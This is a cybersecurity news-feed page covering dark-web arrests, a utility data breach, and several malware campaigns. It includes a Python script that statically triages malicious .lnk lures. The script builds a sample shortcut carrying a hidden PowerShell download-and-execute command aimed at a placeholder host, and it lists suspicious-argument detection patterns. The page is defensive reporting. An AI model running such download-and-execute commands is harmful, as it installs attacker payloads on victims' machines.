Dark Web News

Dark Web News – The Cyber Express Trending Cybersecurity News, Updates, Magazine and More.

  • Dark Web No Longer Safe Haven: 270 Arrested in Global Law Enforcement Raid
    by Samiksha Jain on May 23, 2025 at 9:11 am

    In an international law enforcement operation, 270 individuals involved in dark web criminal activity have been arrested across ten countries. Coordinated by Europol, the operation, codenamed Operation RapTor, targeted online vendors and buyers dealing in illegal drugs, weapons, counterfeit goods, and other illicit items. The crackdown sends a clear message to criminals relying on the anonymity of the dark web: their digital hiding places are no longer safe.

    Operation RapTor: A Coordinated International Effort

    Operation RapTor was led by Europol, with support from law enforcement and intelligence agencies across North America, Europe, South America, and Asia. The arrests followed intelligence gathered from several previously dismantled dark web marketplaces, including Nemesis, Tor2Door, Bohemia, and Kingdom Market. Many of the suspects had carried out thousands of transactions on these platforms, relying on encryption and cryptocurrencies to mask their identities and operations. Those measures did not prevent investigators from tracking and identifying them once the seized marketplace data was shared across borders.

    The arrests were distributed across the participating countries:

      - United States: 130 arrests
      - Germany: 42 arrests
      - United Kingdom: 37 arrests
      - France: 29 arrests
      - South Korea: 19 arrests
      - Austria and Netherlands: 4 arrests each
      - Brazil: 3 arrests
      - Switzerland and Spain: 1 arrest each

    Investigations are ongoing, and more arrests may follow as authorities continue to analyze the seized data.

    Massive Seizures Disrupt Dark Web Supply Chains

    In addition to the arrests, officers confiscated a large volume of illegal goods and financial assets. The operation led to the seizure of:

      - Over €184 million in cash and cryptocurrency
      - More than 2 tonnes of illegal drugs, including amphetamines, cocaine, ketamine, opioids, and cannabis
      - Over 180 firearms, along with imitation weapons, tasers, and knives
      - 12,500 counterfeit products, ranging from fake IDs to branded knock-offs
      - Over 4 tonnes of illicit tobacco

    These seizures have significantly disrupted the criminal supply chains that feed the dark web economy, particularly those involved in the sale of illegal drugs and counterfeit goods.

    Europol’s Role and Strategy

    Europol played a central role by analyzing and sharing intelligence collected from previously seized dark web marketplaces. Investigators compiled this data into intelligence packages and distributed them to national authorities through the Joint Cybercrime Action Taskforce (J-CAT), hosted at Europol headquarters. This collaborative approach mirrors Operation SpecTor, conducted in 2023, which resulted in 288 arrests. Together, these efforts highlight a growing ability among law enforcement agencies to work across borders and identify key players in the dark web ecosystem.

    According to Edvardas Šileris, Head of Europol’s European Cybercrime Centre: “Operation RapTor shows that the dark web is not beyond the reach of law enforcement. Through close cooperation and intelligence sharing, officers across four continents identified and arrested suspects, sending a clear message to those who think they can hide in the shadows.”

    The Growing Threat of Online Crime

    As traditional dark web marketplaces face increasing pressure, criminals are shifting their tactics. Law enforcement officials have observed a growing trend toward single-vendor shops, websites operated by individual sellers. These smaller platforms aim to reduce exposure and avoid the risks associated with larger, centralized marketplaces. Illegal drugs remain the top commodity sold on the dark web. However, law enforcement is also tracking a rise in prescription drug trafficking and fraudulent services, including scam websites offering fake hitmen, forged documents, or non-existent goods to exploit unsuspecting buyers. This shift highlights the evolving nature of cybercrime: as criminals adopt new methods to avoid detection, law enforcement must adapt accordingly.

    Cooperation Is Key

    The success of Operation RapTor was made possible by cooperation between multiple international agencies, including:

      - Austria: Criminal Intelligence Service and Provincial Criminal Police Departments
      - Brazil: Civil Police of the States of Pará and São Paulo
      - France: Customs and National Gendarmerie
      - Germany: Federal Criminal Police, Prosecutor’s Office in Cologne, and German Customs
      - Netherlands: Team High Tech Crime and other national units
      - Spain: National Police
      - South Korea: Darknet Investigations Unit of the Seoul Central District Prosecutors’ Office
      - Switzerland: Zurich Cantonal Police and Public Prosecutor’s Office
      - United Kingdom: National Crime Agency and National Police Chiefs’ Council
      - United States: Department of Justice and a host of federal agencies, including the FBI, DEA, HSI, IRS, ATF, CBP, NCIS, and more

    Strengthening Law Enforcement

    Magnus Brunner, European Commissioner for Internal Affairs and Migration, emphasized the importance of continued investment in law enforcement capabilities: “This operation is proof of how criminal gangs operate today: offline and online, internationally and locally, using technology to their full advantage. To counter this, coordinated action is essential. And that is exactly the added value Europol provides.”

    He added that the European Union is working on ProtectEU, an Internal Security Strategy designed to make law enforcement future-proof. Part of this effort includes increasing funding and expanding the mandate of Europol to respond more effectively to emerging digital threats.

    A Clear Message to Criminals

    The success of Operation RapTor sends a strong and clear message: the dark web is no longer a safe haven for criminals. While the internet provides tools that criminals can use to hide, it also leaves records that law enforcement can use to track and catch them. Through advanced investigative techniques, cross-border cooperation, and the intelligent use of seized data, law enforcement agencies around the world are proving that even the darkest corners of the internet are within reach of justice.

  • Cyberattack Hits Nova Scotia Power: Customer Data Compromised
    by Samiksha Jain on May 15, 2025 at 6:56 am

    Nova Scotia’s largest electric utility, Nova Scotia Power, has confirmed that customer information was stolen in a recent cyberattack that compromised parts of its IT systems. The company, along with its Halifax-based parent firm Emera, discovered the breach on April 25, 2025, and moved to isolate and secure the affected servers. In an official update shared on Wednesday, Nova Scotia Power revealed that the incident had resulted in unauthorized access to sensitive customer information. According to its investigation, the intrusion occurred on or around March 19, 2025, nearly five weeks before it was detected.

    Nova Scotia Power Data Breach: Investigation and Response Underway

    Nova Scotia Power stated it is working closely with external cybersecurity experts to assess the extent of the data breach and to restore and rebuild impacted systems. “We are continuing to investigate the cyber incident that has affected certain IT systems in our network,” the company said in its public communication. “Our priority is to safely and securely restore operations while protecting customer information.”

    Though the investigation is still ongoing, Nova Scotia Power has confirmed that an unauthorized third party accessed and stole certain customer data from the affected servers. Physical operations, including power generation, distribution, and transmission, were not impacted, and customers are still receiving uninterrupted electric service.

    Types of Data Compromised

    The stolen information varies by individual and depends on what each customer had previously provided to the company. The affected data may include:

      - Full name
      - Phone number
      - Email address
      - Mailing and service addresses
      - Participation in Nova Scotia Power programs
      - Date of birth
      - Customer account history (including power consumption, service requests, payment and billing records, credit history, and past customer support communication)
      - Driver’s license number
      - Social Insurance Number (SIN)
      - Bank account numbers (for those enrolled in pre-authorized payments)

    While there is currently no evidence that the stolen information has been misused, the company is urging customers to remain alert for the fraud and scam attempts that typically follow a breach of this kind. Because the exposed fields include Social Insurance Numbers, dates of birth, and bank account numbers, the data is sufficient for identity fraud even though no misuse has been observed so far.

    Support for Affected Customers

    To support impacted individuals, Nova Scotia Power is offering a free two-year subscription to TransUnion’s myTrueIdentity® credit monitoring service. Affected customers will receive notification letters by mail with details about what information was exposed and how to activate the complimentary monitoring service. “If you receive a letter from us, it will contain a dedicated phone number you can call to ask questions and enroll in the credit monitoring service,” the company said in its announcement. This service is intended to help individuals detect suspicious activity tied to their identity or financial information.

    Increase in Fraud Attempts

    Since the incident, Nova Scotia Power has noticed a surge in fraudulent messages and phishing attempts that appear to come from the utility. These include fake emails, text messages, social media posts, and websites impersonating Nova Scotia Power. On its official website and social media, the company has issued a clear warning: “Due to the recent cyber incident, there has been an increase in fraudulent communications posing as Nova Scotia Power. Please remain cautious of any unsolicited messages asking for your personal information. Do not click on links or download attachments from unverified sources.”

    The company advises customers to confirm any suspicious communication by contacting its Customer Care Centre directly through the verified contact details listed on its official website.

    (Source: Nova Scotia Power official website)

    Social Media Update

    Nova Scotia Power also used its official X (formerly Twitter) account to share updates. A thread posted on Wednesday reiterated the company’s apology and reassured customers that every effort is being made to protect their privacy. “We sincerely apologize that this has occurred. Protecting the privacy and security of the information we hold is of the utmost importance to every member of our team,” the company stated. “Starting today, notifications will be sent to impacted individuals via mail. While we have no evidence of misuse of personal information, we have arranged for a two-year subscription to TransUnion’s myTrueIdentity® credit monitoring service at no cost.”

    (Source: X)

    As part of its ongoing response, Nova Scotia Power’s IT team is working with external cybersecurity specialists to rebuild affected systems, improve security measures, and prevent future incidents. The utility emphasized that safeguarding customer data remains a top priority and encourages customers to practice good cyber hygiene by:

      - Verifying the source of any unexpected communication
      - Not sharing personal information over phone, text, or email unless certain of the recipient’s identity
      - Monitoring financial accounts for unusual activity
      - Activating the provided credit monitoring service if notified

    What You Should Do

    If you are a Nova Scotia Power customer and suspect your information may be involved:

      - Watch for a mailed letter from the company with detailed instructions.
      - Enroll in the free two-year credit monitoring service offered through TransUnion.
      - Report any suspicious communications claiming to be from Nova Scotia Power.
      - Contact Nova Scotia Power’s Customer Care Centre if you are unsure about the authenticity of a message.

    While physical infrastructure was unaffected in the Nova Scotia Power cyberattack, the exposure of personal customer data shows how critical IT security has become in the utility sector. The five-week gap between the intrusion and its discovery is the operational lesson here: as investigations continue, the incident highlights the need for stronger data protection practices, monitoring of the dark web for leaked data, and faster breach detection.

  • 4Chan Outage Sparks Cyberattack Rumors and Data Leak Concerns
    by Ashish Khaitan on April 16, 2025 at 10:33 am

    On April 14, 2025, 4Chan, the infamous anonymous image board, experienced downtime due to unexplained outages that left users frustrated and speculating about the cause. While the exact reason for the downtime remains uncertain, some users have suggested that a cyberattack or hacking incident could be responsible.

    According to DownDetector, a service that monitors website disruptions, a surge in user reports highlighted the problems with 4Chan. The issues were largely related to the website itself (72%), server connections (24%), and posting (4%). These reports spiked around 10 p.m. on April 14 and continued into the next day, with many users complaining that 4Chan was intermittently down for hours.

    (Figure: Downdetector outage data for 4Chan. Source: Downdetector)

    4Chan Hacking and Leaked Data Raise Concerns

    As the outage continued, several screenshots allegedly showing 4Chan’s backend surfaced on social media. These images appeared to display source code, templates for banning users, and a list of moderators and “janitors”, users with limited administrative rights. The leaked data even included personal information such as email addresses tied to 4Chan moderators, sparking further suspicion that the site had been hacked. Because the leaks coincided with the downtime, speculation about a cyberattack on 4Chan intensified.

    4Chan’s Controversial History with Cyberattacks

    4Chan has long been associated with controversy and cyberattacks. The platform, which lets users post images and text anonymously, has repeatedly been the subject of boycotts by both users and advertisers, as well as accusations that it hosts hate speech and illegal content. It has even been linked to inspiring mass shootings and other violent events. Additionally, users on 4Chan have been involved in planning cyberattacks, including Distributed Denial-of-Service (DDoS) campaigns. On top of that, 4Chan has been home to the propagation of conspiracy theories, some of which have led to real-world consequences, such as the January 6 insurrection at the U.S. Capitol.

    Given its reputation, the recent downtime and the potential cyberattack on 4Chan have fueled further rumors about the platform’s vulnerability. Some users have speculated that the site was breached, while others believe it could be the result of long-standing software vulnerabilities that 4Chan has yet to address.

    Alleged Hack and Doxxing

    The rumors gained traction after a previously banned 4Chan board briefly reappeared online, followed by a defacement message that read, “U GOT HACKED XD.” Shortly thereafter, an account on a rival forum, Soyjak.party, posted screenshots allegedly revealing parts of 4Chan’s backend systems, including usernames and email addresses of 4Chan’s administrators and moderators. These leaks quickly escalated into a wave of doxxing, in which users shared personal details of 4Chan staff, including photos and other private information.

    Though the validity of these claims remains unclear, TechCrunch reported that one 4Chan moderator believed the leak and cyberattack were genuine. Despite multiple attempts, WIRED could not reach 4Chan for an official statement, further deepening the uncertainty surrounding the incident.

    Conclusion

    The alleged cyberattack on 4Chan highlights the platform’s ongoing struggles with outdated software, security vulnerabilities, and its controversial reputation. Despite earlier reassurances from the site’s founder, Christopher Poole, regarding security improvements, 4Chan’s legacy of hosting questionable content and attracting extremist users appears to have left it susceptible to breaches. Over the years, the platform’s transformation from a niche space for anime fans to a hub for more nefarious activities has only deepened its notoriety. While the exact cause of the recent incident remains unclear, it is evident that 4Chan continues to face security challenges, not just in securing its infrastructure but also in managing its reputation.

  • DOGE BIG BALLS Campaign Blurs Lines Between Exploitation, Recon, and Reputation Damage
    by Ashish Khaitan on April 15, 2025 at 7:08 am

    Cyble researchers have analyzed a ransomware campaign called DOGE BIG BALLS that stands out for pairing real technical capability with audacious psychological manipulation. The campaign weaves together kernel-level exploitation, social engineering, and a deliberate attempt to misattribute blame, linking itself to Edward Coristine, a 19-year-old software engineer associated with Elon Musk’s DOGE initiative.

    The Genesis of the DOGE BIG BALLS Attack: A Deceptive ZIP File

    (Figure: DOGE BIG BALLS infection chain. Source: Cyble)

    The attack begins with a seemingly innocuous ZIP file titled “Pay Adjustment.zip,” typically disseminated through phishing emails. Inside, a shortcut file named “Pay Adjustment.pdf.lnk” awaits unsuspecting victims. The double extension works because Windows Explorer never displays the .lnk extension of a shortcut, even when extension display is enabled, so the file appears to be a PDF.

    (Figure: Contents of the LNK file. Source: Cyble)

    Upon activation, the shortcut silently executes a series of PowerShell commands that initiate a multi-stage infection. The first script, stage1.ps1, checks for administrative privileges. If it has them, it downloads and executes a modified version of Fog ransomware, masquerading as “Adobe Acrobat.exe” inside a hidden folder in the system’s startup directory. Because stage1.ps1 only proceeds when already elevated, the ransomware runs with administrative privileges from the start, and the startup-folder placement gives it persistence across logons.

    (Figure: DOGE BIG BALLS ransomware prompt. Source: Cyble)

    Exploiting Kernel Vulnerabilities: The CVE-2015-2291 Flaw

    A pivotal aspect of this attack is the exploitation of CVE-2015-2291, a vulnerability in Intel’s Ethernet diagnostics driver (iqvw64e.sys). The flaw allows an attacker to execute arbitrary code with kernel-level privileges through specially crafted IOCTL calls. By leveraging it, the attackers escalate privileges, disable security logging, and maintain persistence on the compromised system. The malicious tool ktool.exe performs this exploitation: it installs the vulnerable, legitimately signed driver as a kernel-mode service, giving the ransomware process read and write access to kernel memory. That access is used to copy the access token of a SYSTEM process into the ransomware process, elevating it and letting it disable security mechanisms. This is a bring-your-own-vulnerable-driver (BYOVD) technique, and the standard control against it is an enforced vulnerable-driver blocklist (such as Microsoft’s recommended driver block rules or the community LOLDrivers list): a driver on the enforced list cannot be loaded, however valid its signature.

    Psychological Manipulation: The “DOGE BIG BALLS” Branding

    The ransomware’s name is a deliberate attempt to associate the attack with Edward Coristine and the DOGE initiative. Coristine is a publicly known figure because of his involvement with Elon Musk’s Department of Government Efficiency (DOGE). By incorporating his name and the DOGE reference, the attackers aim to create confusion and misdirect any investigation. The ransom note compounds this misdirection by including Coristine’s personal details, such as his home address and phone number. The tactic serves to intimidate the victim and divert attention from the true perpetrators.

    (Figure: Ransom chat window. Source: Cyble)

    Advanced Reconnaissance and Geolocation Techniques

    Beyond encryption, the attackers gather intelligence about their victims. The lootsubmit.ps1 script collects extensive system and network information, including hardware IDs, firewall states, network configurations, and running processes. This data is transmitted to the attackers via a cloud hosting platform (Netlify, according to Cyble), aiding in further profiling and potential future attacks.

    Notably, the attackers use the Wigle.net API to determine the victim’s physical location. By looking up the MAC address of the victim’s wireless router (its BSSID), they can obtain a far more precise position than IP-based geolocation provides. The caveat is that this only works when that access point has already been recorded in Wigle’s crowdsourced wardriving database; if it has not, the lookup returns nothing.

    The Role of Havoc C2 Beacon in Post-Exploitation

    Embedded within the attack is a Havoc C2 beacon (demon.x64.dll), indicating that the attackers can maintain long-term access or conduct additional post-encryption activity. The beacon communicates with the attackers’ command and control infrastructure, enabling them to issue further instructions or exfiltrate additional data from the compromised system.

    The Involvement of Edward Coristine: A Case of Misattribution

    Edward Coristine’s name appears prominently in the ransom note, accompanied by his personal contact information. This is a strategic move to mislead investigators and the public into believing that Coristine is responsible for the attack. In reality, Coristine has no involvement in this cybercrime. The use of his name is a calculated attempt to exploit his association with DOGE, a project aimed at promoting efficiency and transparency in government operations, and to create a false narrative. By attaching a recognizable public figure to the ransomware, the attackers seek to lend notoriety to their demands and confuse potential investigators.

    Conclusion

    To defend against DOGE BIG BALLS ransomware attacks, which combine technical capability, psychological manipulation, and strategic misdirection, organizations and individuals must adopt a proactive and layered defense strategy. Effective mitigation begins with enforcing strict execution policies to block untrusted LNK files and PowerShell scripts, while consistently monitoring PowerShell activity for anomalies. Deploying Endpoint Detection and Response (EDR) capable of identifying fileless malware and suspicious behavior is essential, as is preventing known vulnerable drivers such as iqvw64e.sys from loading. Limiting administrative privileges through Role-Based Access Control (RBAC) and monitoring for privilege escalation attempts further reduces exposure. Additionally, blocking unauthorized outbound connections to services like Netlify and external APIs such as Wigle.net is crucial for preventing data exfiltration and geolocation tracking.
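
    The LNK lure above is worth examining statically before anything is allowed to run. The following is an added example written for this page (not Cyble’s code or tooling) that parses the parts of the Windows Shell Link format needed to recover a shortcut’s target, arguments, icon and window state, then scores the indicators this campaign relies on: a document-like double extension, a PowerShell target, download-and-execute arguments, a hidden window, and a document-application icon. The sample shortcut is constructed inside the script to mirror the described lure; its download URL (example.invalid) and icon path are placeholders, not indicators from the report.

```python
"""Static triage of a Windows Shell Link (.lnk) lure such as 'Pay Adjustment.pdf.lnk'.
Implements the parts of the [MS-SHLLINK] layout needed to recover target, arguments,
icon and window state, then scores the lure indicators described in the article."""
import struct
import uuid

LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046").bytes_le
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR = 0x04, 0x08, 0x10
HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE = 0x20, 0x40, 0x80
SW_SHOWNORMAL, SW_SHOWMINNOACTIVE = 1, 7   # 7 = start minimised without taking focus

# StringData structures follow the header (and optional IDList/LinkInfo) in this fixed order.
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))


def _string_data(text):
    # CountCharacters (uint16) followed by the UTF-16LE characters, no terminator.
    return struct.pack("<H", len(text)) + text.encode("utf-16-le")


def build_lnk(relative_path, arguments="", icon_location=None, show_command=SW_SHOWNORMAL):
    """Fabricate a minimal .lnk (no IDList/LinkInfo); used only to build the sample below."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    if icon_location is not None:
        flags |= HAS_ICON_LOCATION
    # ShellLinkHeader: size, CLSID, flags, attributes, 3 FILETIMEs, file size, icon index,
    # ShowCommand, hotkey, three reserved fields = 76 bytes.
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags,
                         0, 0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    body = _string_data(relative_path) + _string_data(arguments)
    if icon_location is not None:
        body += _string_data(icon_location)
    return header + body


def parse_lnk(data):
    """Return the header ShowCommand plus whichever StringData fields the flags announce."""
    if len(data) < 0x4C or struct.unpack_from("<I", data)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    info = {"show_command": struct.unpack_from("<I", data, 60)[0]}
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:       # IDListSize (uint16) + IDList bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                 # LinkInfoSize (uint32) counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    for flag, key in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + width * count]
        info[key] = raw.decode("utf-16-le") if width == 2 else raw.decode("cp1252", "replace")
        pos += width * count
    return info


DOC_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png")
SCRIPT_HOSTS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript", "rundll32")
SUSPICIOUS_ARGS = ("-w hidden", "-windowstyle hidden", "-enc", "-nop", "bypass", "iex",
                   "invoke-expression", "downloadstring", "invoke-webrequest", "iwr ")


def triage_lnk(filename, data):
    """Return (parsed fields, list of findings) for one shortcut file."""
    info = parse_lnk(data)
    findings = []
    stem = filename.lower()
    stem = stem[:-4] if stem.endswith(".lnk") else stem
    if stem.endswith(DOC_EXTENSIONS):         # Explorer hides .lnk, so this reads as a document
        findings.append("document-like double extension: " + filename)
    target = (info.get("relative_path") or info.get("name") or "").lower()
    if any(host in target for host in SCRIPT_HOSTS):
        findings.append("target is a script host / LOLBin: " + target)
    args = info.get("arguments", "").lower()
    hits = [tok.strip() for tok in SUSPICIOUS_ARGS if tok in args]
    if hits:
        findings.append("suspicious arguments: " + ", ".join(hits))
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("window hidden via ShowCommand=SW_SHOWMINNOACTIVE")
    icon = info.get("icon_location", "").lower()
    if any(app in icon for app in ("acrord32", "acrobat", "winword", "excel")):
        findings.append("document-application icon masquerade: " + icon)
    return info, findings


# Constructed sample mirroring the described lure; the URL and icon path are placeholders.
SAMPLE_LNK = build_lnk(
    relative_path=r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    arguments="-nop -w hidden -ep bypass -c \"iex (New-Object Net.WebClient)"
              ".DownloadString('http://example.invalid/stage1.ps1')\"",
    icon_location=r"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe",
    show_command=SW_SHOWMINNOACTIVE,
)

if __name__ == "__main__":
    parsed, found = triage_lnk("Pay Adjustment.pdf.lnk", SAMPLE_LNK)
    for finding in found:
        print("[!]", finding)
```

    Real lures usually carry a LinkTargetIDList and LinkInfo as well; the parser skips both by their length fields, so it still reaches the StringData, which is where the command line lives. A shortcut pointing at PowerShell with SW_SHOWMINNOACTIVE and a .pdf stem has no legitimate reason to exist on a user’s desktop.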

  • CERT-UA Warns of Escalating Cyberattacks Targeting Ukraine’s Defense Sector with DarkCrystal RAT
    by Ashish Khaitan on March 21, 2025 at 8:12 am

    The Computer Emergency Response Team of Ukraine (CERT-UA) has issued a warning about a series of targeted cyberattacks aimed at employees of Ukraine’s defense-industrial complex and members of the Armed Forces. The activity is tracked under the identifier UAC-0200 and marks an escalation in espionage leveraging the DarkCrystal RAT (DCRAT). According to CERT-UA, the attacks, ongoing since at least the summer of 2024, employ targeted tactics to gain unauthorized access to sensitive information. One of the primary techniques identified involves the Signal messaging app, where the actors spread messages disguised as meeting reports.

    These deceptive messages typically carry a compressed archive containing a PDF document and an executable classified as DarkTortilla. DarkTortilla serves as a cryptor/loader that decrypts and launches the DarkCrystal RAT (DCRAT) on the infected system.

    How the DarkCrystal RAT Works

    DarkCrystal RAT (DCRAT) is a remote access tool that allows its operators to control infected systems from a distance. Once installed, it grants them full control over the victim’s device, enabling them to exfiltrate sensitive information, manipulate data, and deploy additional malicious payloads. The use of DarkTortilla as a loader is particularly concerning because it hides the malicious payload inside a seemingly innocuous file and decrypts it only at runtime, which defeats static detection of the RAT itself.

    CERT-UA further noted that starting in February 2025, the lures shifted toward topics related to unmanned aerial vehicles (UAVs) and electronic warfare systems. This shift suggests that the attackers are now targeting specific defense technologies, likely to gather intelligence on Ukraine’s military capabilities.

    Leveraging Social Engineering Tactics for Cyberattacks

    A key feature of these attacks is the use of social engineering to manipulate victims into opening malicious attachments. Using Signal, a popular messaging platform, gives the attackers a delivery channel that sits outside the email security stack most organizations rely on. Messages often appear to come from trusted sources, such as colleagues or business partners, whose accounts have already been compromised. Because the attackers exploit legitimate communication channels, traditional security controls have a harder time detecting and blocking the payloads.

    CERT-UA’s Ongoing Monitoring and Response

    CERT-UA has been closely monitoring these threats and urges everyone working in the defense sector to remain vigilant. Anyone receiving suspicious messages or files is encouraged to report them immediately to the authorities through all available means.

    As part of its response, CERT-UA has released indicators of compromise (IOCs) to help organizations identify and respond to the threat. These include file hashes and network addresses associated with the attack. The listed files include archives such as “Звіт 10.03.25.rar” (“Report 10.03.25.rar”) and “Наказ 17.02.2025.pdf” (“Order 17.02.2025.pdf”), which contain the malicious executables linked to the DarkCrystal RAT.

    The network addresses linked to the attacks are published in defanged form (“[.]” in place of “.”) so they cannot be clicked or resolved by accident:

      - 45[.]130.214.237
      - 62[.]60.235.190
      - 87[.]249.50.64
      - 217[.]25.91.61
      - 83[.]147.253.138

    Several URLs associated with the compromised network infrastructure are also listed; they are used to deliver the payload and maintain communication between infected systems and the attackers’ servers.

    The UAC-0200 campaign highlights the growing cybersecurity risks faced by Ukraine’s defense sector. The use of malware like DarkCrystal RAT (DCRAT) underlines the need for stronger security, especially against social engineering that exploits communication tools such as Signal. As the attackers become more advanced, constant vigilance and proactive security measures are essential. CERT-UA’s monitoring plays a crucial role in managing these threats, but individuals must also stay alert and report suspicious activity. With attacks becoming more sophisticated, it is vital for both government and private sectors to collaborate in strengthening defenses to protect Ukraine’s defense infrastructure and national security.

  • Silk Typhoon Expands Cyber Espionage Tactics to Target IT Supply Chain
    by Ashish Khaitan on March 6, 2025 at 12:19 pm

    The Chinese espionage group known as Silk Typhoon has expanded its operations to target the global IT supply chain. Microsoft Threat Intelligence has identified a shift in the group’s tactics toward commonly used IT solutions such as remote management tools and cloud applications. The group’s aim is to gain initial access to victim organizations and then move further into their networks to conduct espionage.

    Since 2020, Silk Typhoon has become one of the most formidable Chinese state-backed threat actors. Its activities demonstrate a high level of resourcefulness and technical expertise, allowing it to exploit vulnerabilities rapidly. Its tactics center on discovering and leveraging zero-day vulnerabilities in IT infrastructure, particularly public-facing devices that remain unpatched. Its swift operational tempo and opportunistic approach make it one of the most active cyber espionage groups in the world.

    While Microsoft has not observed Silk Typhoon targeting its cloud services directly, the group exploits unpatched applications to elevate access and extend its reach across organizational networks. Once a victim is compromised, the group obtains sensitive information and tools, using stolen credentials to abuse applications, some of which are Microsoft services, to meet its espionage objectives.

    Silk Typhoon Targets a Wide Range of Sectors

    The scope of Silk Typhoon’s attacks is expansive, spanning information technology, defense, government, healthcare, energy, legal services, education, and non-governmental organizations (NGOs) worldwide. The attacks are not confined to any one region; Silk Typhoon has targeted organizations both in the United States and internationally. The group is especially interested in sectors that hold sensitive data or play a critical role in global infrastructure.

    Its understanding of cloud environments allows it to move laterally through victim networks with ease, maintain persistence, escalate privileges, and exfiltrate valuable data rapidly. Microsoft Threat Intelligence has tracked Silk Typhoon since 2020, documenting operational methods that include using web shells to execute commands and maintain persistent access in compromised environments.

    Compromise of IT Supply Chains

    Microsoft’s recent research, covering activity observed since late 2024, reveals new tactics. The most significant change is the group’s compromise of the IT supply chain: it uses stolen API keys and credentials to access third-party service providers, gaining a foothold into downstream customer environments. Targets have included privileged access management (PAM) vendors, cloud application providers, and cloud data management companies. Once in through a stolen API key, Silk Typhoon performs reconnaissance on victim devices and harvests data, showing particular interest in information on U.S. government policy, law enforcement investigations, and legal processes of strategic value to China’s geopolitical interests. Post-compromise activity includes resetting admin accounts, implanting web shells, creating new users, and clearing system logs to hide its tracks. A stolen API key presents to the provider as the legitimate customer, so this access looks like normal tenant activity unless key usage is monitored for anomalous source addresses, volume, or timing.

    Password Spray and Abuse

    In addition to exploiting software vulnerabilities, Silk Typhoon abuses weak password practices to gain access. The group has used password spray attacks, in which a small set of common passwords is tried across many accounts to stay under lockout thresholds, alongside other password abuse techniques. It has also conducted reconnaissance using publicly available data, such as leaked corporate passwords found in repositories on GitHub. These weaknesses often provide the first step in the attack chain, granting initial access to victim environments. Once inside, the group moves laterally with compromised credentials and steals data across both on-premises and cloud systems. Notably, Silk Typhoon has targeted Microsoft AADConnect (now Entra Connect) servers, which synchronize on-premises Active Directory with Azure Active Directory (now Microsoft Entra ID), allowing it to escalate privileges and pivot between environments.

    Cloud Environments and Data Exfiltration

    A key aspect of Silk Typhoon’s operations is infiltrating cloud environments. After compromising an on-premises environment, the group extends its access to the cloud by targeting service principals and OAuth applications that hold administrative permissions. That access lets it harvest email via the Microsoft Graph API and, in some cases, via Exchange Web Services (EWS). In some cases, Silk Typhoon has created Entra ID applications designed to mimic legitimate services within the environment, such as Office 365. These efforts are part of a broader strategy to exfiltrate data, move across tenants, and conduct further espionage without detection.

    Conclusion

    Silk Typhoon relies on covert networks, such as the CovertNetwork made up of compromised devices including Cyberoam appliances, Zyxel routers, and QNAP devices, to obscure its activity and maintain a low profile while exfiltrating data from victim environments. As nations and organizations increasingly depend on cloud technologies and complex IT infrastructures, Silk Typhoon’s ability to exploit these systems highlights the need for better cybersecurity defenses.

  • Phantom Goblin: A New Threat in Credential Theft and Remote System Access
    by Ashish Khaitan on March 6, 2025 at 10:31 am

    A new malware campaign named Phantom Goblin, identified and analyzed by Cyble, delivers information-stealing malware that relies on social engineering to deceive victims and steal sensitive data, including browser credentials and cookies. The campaign is notable for its use of trusted tools and services like PowerShell and Visual Studio Code (VSCode), which help it evade traditional security mechanisms and establish covert, persistent remote access.

    Key Insights into Phantom Goblin

    Phantom Goblin Infection Chain (Source: Cyble)

    Phantom Goblin primarily targets browsers and developer tools, leveraging social engineering and malicious scripts to install and operate undetected. According to Cyble Research and Intelligence Labs (CRIL), the malware works by tricking users into executing a disguised LNK file, which then triggers a series of payloads designed to extract and exfiltrate sensitive data.

    Social Engineering and Initial Infection: The malware distribution typically begins with a deceptive RAR archive that contains a malicious LNK file. The file is named to resemble a legitimate document, such as a PDF, prompting users to click on it. When executed, the LNK file runs a PowerShell script, which silently downloads additional payloads from a GitHub repository. This script also ensures persistence by adding itself to the Windows registry, allowing the malware to run each time the system restarts.

    Exploitation of Browser Vulnerabilities: Once installed, Phantom Goblin turns its attention to web browsers, seeking to extract cookies and login credentials. To do so, it uses a technique that bypasses Chrome’s App Bound Encryption (ABE), enabling it to collect browser data without triggering user alerts. By forcefully terminating active browser processes, the malware ensures that cookie files can be accessed and stolen without interference.

    Use of Visual Studio Code (VSCode) Tunnels: One of the standout features of Phantom Goblin is its ability to establish unauthorized remote access to infected systems. The malware achieves this by deploying a malicious binary named “vscode.exe,” which creates a Visual Studio Code tunnel on the compromised machine. This allows the attackers to control the system remotely while bypassing traditional security mechanisms.

    Stealthy Exfiltration via Telegram: Phantom Goblin’s data exfiltration process is another key component of its covert operation. Using Telegram’s bot API, the malware can send stolen information, including cookies, credentials, and browsing history, to a remote Telegram channel. This technique helps ensure that the stolen data reaches the attackers without detection, even as the malware continues to operate on the compromised machine.

    Persistence and Evasion Tactics: The attackers behind Phantom Goblin take great care to ensure the malware remains undetected and persists on infected systems. The malware’s payloads are designed to appear as legitimate software, such as “updater.exe” or “browser.exe,” which further complicates detection by traditional security tools. The use of trusted services like GitHub and PowerShell for downloading additional payloads makes it harder for antivirus software to identify malicious activity.

    Infection Chain and Malicious Payloads

